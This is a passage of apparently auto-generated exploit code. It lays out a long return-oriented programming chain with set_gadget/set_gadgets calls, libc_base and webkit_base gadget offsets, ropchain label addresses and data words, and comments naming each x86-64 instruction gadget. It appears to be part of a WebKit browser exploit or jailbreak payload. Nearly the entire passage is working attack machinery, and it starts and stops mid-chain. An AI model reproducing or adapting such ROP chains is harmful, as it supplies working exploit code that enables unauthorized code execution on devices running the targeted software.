db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1837:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1838:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+136936, //L1841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+136952, //L1842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+136904, //L1839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1839:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1840:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L1841:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1842:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+137024, //L1843
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1843:
db([0, 0]); // 0x0
//L1736:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+137152, //L1846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+137168, //L1847
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+137136, //L1845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1845:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1846:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1847:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+137280, //L1849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+137328, //L1852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+137296, //L1850
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1849:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1850:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1851:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1852:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+137440, //L1853+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+137432, //L1853
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L1853:
db([0, 0]); // 0x0
set_gadgets([
ropchain+137456, //L1853+24
ropchain+139800, //L1848
libc_base+764760, //pop rsi
ropchain+137496, //L1854
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1854:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1856:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+137616, //L1859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+137600, //L1857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1857:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1859:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+137792, //L1862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+137808, //L1863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+137760, //L1860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+137776, //L1861
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1860:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1861:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1862:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1863:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+137888, //L1864
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+137904, //L1865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1864:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1865:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+138064, //L1869
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+138032, //L1867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+138048, //L1868
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1866:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L1867:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1868:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1869:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+138168, //L1871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+138152, //L1870
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1870:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1871:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+138248, //L1872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1872:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1874:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+138368, //L1877
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+138352, //L1875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1875:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1877:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+138448, //L1878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+138464, //L1879
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1878:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1879:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+138608, //L1882
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+138576, //L1880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+138592, //L1881
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1880:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1881:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1882:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+138696, //L1884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L1883:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L1884:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+138784, //L1885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1885:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1887:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+138904, //L1890
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+138888, //L1888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1888:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1890:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+138992, //L1891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+139008, //L1893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L1891:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1893:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+139064, //L1894
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1894:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+139184, //L1897
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1897:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+139240, //L1898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1898:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+139384, //L1902
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+139368, //L1901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1900:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L1901:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1902:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+139504, //L1903
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+139536, //L1905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+139520, //L1904
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1903:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1904:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1905:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+139640, //L1906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+139656, //L1907
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1906:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1907:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+139776, //L1908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+139760, //L1909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1909:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1908:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+141248, //L1910
//L1848:
libc_base+764760, //pop rsi
ropchain+139840, //L1911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1911:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1913:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+139960, //L1916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+139944, //L1914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1914:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1916:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+140104, //L1919
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+140072, //L1917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+140088, //L1918
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1917:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1918:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1919:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+140184, //L1920
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1920:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1922:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+140304, //L1925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+140288, //L1923
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1923:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1925:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+140480, //L1928
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+140496, //L1929
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+140448, //L1926
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+140464, //L1927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1926:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1927:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1928:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1929:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+140592, //L1931
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+140576, //L1930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1930:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1931:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L1933:
ropchain+140696, //L1932
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+141576, //L1934
//L1932:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+140840, //L1936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+140856, //L1937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+140824, //L1935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1935:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1936:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1937:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+140968, //L1938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+141000, //L1940
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+140984, //L1939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1938:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1939:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1940:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+141104, //L1941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+141120, //L1942
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1941:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1942:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+141240, //L1943
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+141224, //L1944
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1944:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1943:
db([0, 0]); // 0x0
//L1910:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+141328, //L1946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+141312, //L1945
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1945:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1946:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+141432, //L1947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+141448, //L1948
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1947:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1948:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+141568, //L1949
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+141552, //L1950
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1950:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1949:
db([0, 0]); // 0x0
//L1934:
set_gadget(libc_base+764760,); //pop rsi
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+1438842, //pop rdx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+3236123, //pop r9
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+756281, //xor rax, rax
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+782311, //pop rsp
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967080, 4294967295]); // -0xd8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([200, 0]); // 0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967088, 4294967295]); // -0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([192, 0]); // 0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967096, 4294967295]); // -0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([184, 0]); // 0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967104, 4294967295]); // -0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([176, 0]); // 0xb0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967112, 4294967295]); // -0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([168, 0]); // 0xa8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
webkit_base+14664103, //and rax, rcx
